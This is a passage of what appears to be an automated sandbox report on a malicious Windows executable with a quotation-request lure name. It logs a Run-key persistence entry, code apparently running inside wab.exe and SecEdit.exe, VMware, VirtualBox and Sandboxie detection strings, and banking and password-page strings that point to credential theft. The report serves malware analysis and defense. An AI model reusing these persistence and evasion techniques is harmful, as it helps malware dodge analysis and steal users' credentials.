            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Windows\SysWOW64\msftedit.dll
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\SecEdit.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Static file information: File size 3079318 > 1048576
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Xml.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.pdb` source: WER6339.tmp.dmp.8.dr
            Source: Binary string: SecEdit.pdb source: wab.exe, 00000004.00000002.1543304838.0000000003197000.00000004.00000020.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3791818331.000000000102E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000004.00000003.1452243090.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1450246233.0000000003290000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.000000000378E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1545415018.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1543063354.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000004.00000003.1452243090.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1450246233.0000000003290000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.000000000378E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, SecEdit.exe, 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1545415018.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1543063354.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER6339.tmp.dmp.8.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Configuration.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Core.pdbH source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wab.pdbGCTL source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3793502568.00000000035CC000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001F9DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wab.pdb source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3793502568.00000000035CC000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001F9DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.Core.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: mscorlib.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: Binary string: SecEdit.pdbGCTL source: wab.exe, 00000004.00000002.1543304838.0000000003197000.00000004.00000020.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3791818331.000000000102E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000000.1467468971.00000000006CE000.00000002.00000001.01000000.00000008.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3790653322.00000000006CE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: System.Drawing.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: mscorlib.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Core.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.pdb8 source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Xml.pdbpH source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C0236F62 push esi; iretd 0_2_00007FF7C0236FD7
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C0320000 push esp; retf 4810h0_2_00007FF7C0320312
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0041E006 push edx; iretd 4_2_0041DFE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0041E006 push ss; ret 4_2_0041E025
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004051ED push edx; ret 4_2_00405225
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004032E0 push eax; ret 4_2_004032E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00422C43 pushad ; iretd 4_2_00422CEC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040CC0D push edi; iretd 4_2_0040CC0E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00411413 push edi; iretd 4_2_0041141A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040CD21 pushfd ; retf 4_2_0040CD22
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00413E8B push eax; retf 4_2_00413E8C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040A746 push eax; iretd 4_2_0040A74D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0041DF1C push edx; iretd 4_2_0041DFE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0041DF23 push edx; iretd 4_2_0041DFE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00404F37 push cs; ret 4_2_00404F3A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036209AD push ecx; mov dword ptr [esp], ecx4_2_036209B6
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FD09AD push ecx; mov dword ptr [esp], ecx12_2_02FD09B6
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0059008E pushfd ; retf 12_2_00590095
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0057E130 push edi; iretd 12_2_0057E137
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_005901A8 push edx; iretd 12_2_005901B9
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00577463 push eax; iretd 12_2_0057746A
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058B657 pushad ; retf 12_2_0058B658
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0059067C pushad ; iretd 12_2_00590699
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0059069D push esp; iretd 12_2_005906AA
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058F960 pushad ; iretd 12_2_0058FA09
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058F9EF pushad ; iretd 12_2_0058FA09
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058BA1D push ds; ret 12_2_0058BA2B
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00571C54 push cs; ret 12_2_00571C57
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058AC40 push edx; iretd 12_2_0058ACFD
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058AC39 push edx; iretd 12_2_0058ACFD
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058AD23 push edx; iretd 12_2_0058ACFD

            Boot Survival

            Source: C:\Windows\SysWOW64\SecEdit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26RXLR-

            Hooking and other Techniques for Hiding and Protection

            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (27).png
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\SecEdit.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match, File source: Process Memory Space: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe PID: 7448, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\SecEdit.exe API/Special instruction interceptor: Address: 7FF8418CD324
            Source: C:\Windows\SysWOW64\SecEdit.exe API/Special instruction interceptor: Address: 7FF8418CD7E4
            Source: C:\Windows\SysWOW64\SecEdit.exe API/Special instruction interceptor: Address: 7FF8418CD944
            Source: C:\Windows\SysWOW64\SecEdit.exe API/Special instruction interceptor: Address: 7FF8418CD504
            Source: C:\Windows\SysWOW64\SecEdit.exe API/Special instruction interceptor: Address: 7FF8418CD544
            Source: C:\Windows\SysWOW64\SecEdit.exe API/Special instruction interceptor: Address: 7FF8418CD1E4
            Source: C:\Windows\SysWOW64\SecEdit.exe API/Special instruction interceptor: Address: 7FF8418D0154
            Source: C:\Windows\SysWOW64\SecEdit.exe API/Special instruction interceptor: Address: 7FF8418CDA44
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe Memory allocated: 23E068B0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe Memory allocated: 23E20420000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0369D1C0 rdtsc 4_2_0369D1C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8155
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1516
            Source: C:\Windows\SysWOW64\SecEdit.exe Window / User API: threadDelayed 3255
            Source: C:\Windows\SysWOW64\SecEdit.exe Window / User API: threadDelayed 6717
            Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.9 %
            Source: C:\Windows\SysWOW64\SecEdit.exe API coverage: 3.3 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800 Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\SysWOW64\SecEdit.exe TID: 8148 Thread sleep count: 3255 > 30
            Source: C:\Windows\SysWOW64\SecEdit.exe TID: 8148 Thread sleep time: -6510000s >= -30000s
            Source: C:\Windows\SysWOW64\SecEdit.exe TID: 8148 Thread sleep count: 6717 > 30
            Source: C:\Windows\SysWOW64\SecEdit.exe TID: 8148 Thread sleep time: -13434000s >= -30000s
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe TID: 7260 Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe TID: 7260 Thread sleep time: -43500s >= -30000s
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe TID: 7260 Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe TID: 7260 Thread sleep time: -32000s >= -30000s
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\SecEdit.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 12_2_0058BC80 FindFirstFileW,FindNextFileW,FindClose, 12_2_0058BC80
            Source: 1150d71.12.dr Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: 1150d71.12.dr Binary or memory string: tasks.office.comVMware20,11696501413o
            Source: Amcache.hve.8.dr Binary or memory string: VMware
            Source: 1150d71.12.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: 1150d71.12.dr Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: 1150d71.12.dr Binary or memory string: dev.azure.comVMware20,11696501413j
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: 1150d71.12.dr Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: Amcache.hve.8.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: 1150d71.12.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
            Source: Amcache.hve.8.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: 1150d71.12.dr Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: 1150d71.12.dr Binary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: 1150d71.12.dr Binary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: firefox.exe, 00000013.00000002.1889026777.00000255DF8EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
            Source: Amcache.hve.8.dr Binary or memory string: vmci.sys
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: Amcache.hve.8.dr Binary or memory string: VMware20,1
            Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.8.dr Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.8.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: 1150d71.12.dr Binary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.8.dr Binary or memory string: VMware PCI VMCI Bus Device
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: 1150d71.12.dr Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: Amcache.hve.8.dr Binary or memory string: VMware VMCI Bus Device
            Source: 1150d71.12.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual RAM
            Source: 1150d71.12.dr Binary or memory string: outlook.office365.comVMware20,11696501413t
            Source: Amcache.hve.8.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: 1150d71.12.dr Binary or memory string: interactiveuserers.comVMware20,11696501413
            Source: 1150d71.12.dr Binary or memory string: AMC password management pageVMware20,11696501413
            Source: Amcache.hve.8.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: wab.exe, 0000000F.00000002.1667587369.00000000034C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_SATA_CD00#4&l
            Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual USB Mouse
            Source: 1150d71.12.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin
            Source: Amcache.hve.8.dr Binary or memory string: VMware, Inc.
            Source: Amcache.hve.8.dr Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.8.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.8.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.8.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: 1150d71.12.dr Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: 1150d71.12.dr Binary or memory string: bankofamerica.comVMware20,11696501413x
            Source: 1150d71.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: Amcache.hve.8.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: 1150d71.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: Amcache.hve.8.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792104250.000000000119F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
            Source: 1150d71.12.dr Binary or memory string: outlook.office.comVMware20,11696501413s
            Source: 1150d71.12.dr Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: wab.exe, 00000011.00000002.1747546615.0000000002CF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.8.dr Binary or memory string: \driver\vmci,\driver\pci
            Source: 1150d71.12.dr Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: 1150d71.12.dr Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: 1150d71.12.dr Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: Amcache.hve.8.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.8.dr Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
            Source: Amcache.hve.8.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: 1150d71.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: 1150d71.12.dr Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: 1150d71.12.dr Binary or memory string: global block list test formVMware20,11696501413
            Source: 1150d71.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: 1150d71.12.dr Binary or memory string: discord.comVMware20,11696501413f
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe Process queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\SecEdit.exe Process queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00417553 LdrLoadDll, 4_2_00417553
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036DF367 mov eax, dword ptr fs:[00000030h] 4_2_036DF367
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036C437C mov eax, dword ptr fs:[00000030h] 4_2_036C437C
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_03627370 mov eax, dword ptr fs:[00000030h] 4_2_03627370
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h] 4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0361D34C mov eax, dword ptr fs:[00000030h] 4_2_0361D34C
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036F5341 mov eax, dword ptr fs:[00000030h] 4_2_036F5341
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_03619353 mov eax, dword ptr fs:[00000030h] 4_2_03619353
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036A035C mov eax, dword ptr fs:[00000030h] 4_2_036A035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036A035C mov ecx, dword ptr fs:[00000030h] 4_2_036A035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036EA352 mov eax, dword ptr fs:[00000030h] 4_2_036EA352
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036E132D mov eax, dword ptr fs:[00000030h] 4_2_036E132D
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0364F32A mov eax, dword ptr fs:[00000030h] 4_2_0364F32A
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_03617330 mov eax, dword ptr fs:[00000030h] 4_2_03617330
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036A930B mov eax, dword ptr fs:[00000030h] 4_2_036A930B
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0365A30B mov eax, dword ptr fs:[00000030h] 4_2_0365A30B
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0361C310 mov ecx, dword ptr fs:[00000030h] 4_2_0361C310
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_03640310 mov ecx, dword ptr fs:[00000030h] 4_2_03640310
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036303E9 mov eax, dword ptr fs:[00000030h] 4_2_036303E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036DF3E6 mov eax, dword ptr fs:[00000030h] 4_2_036DF3E6
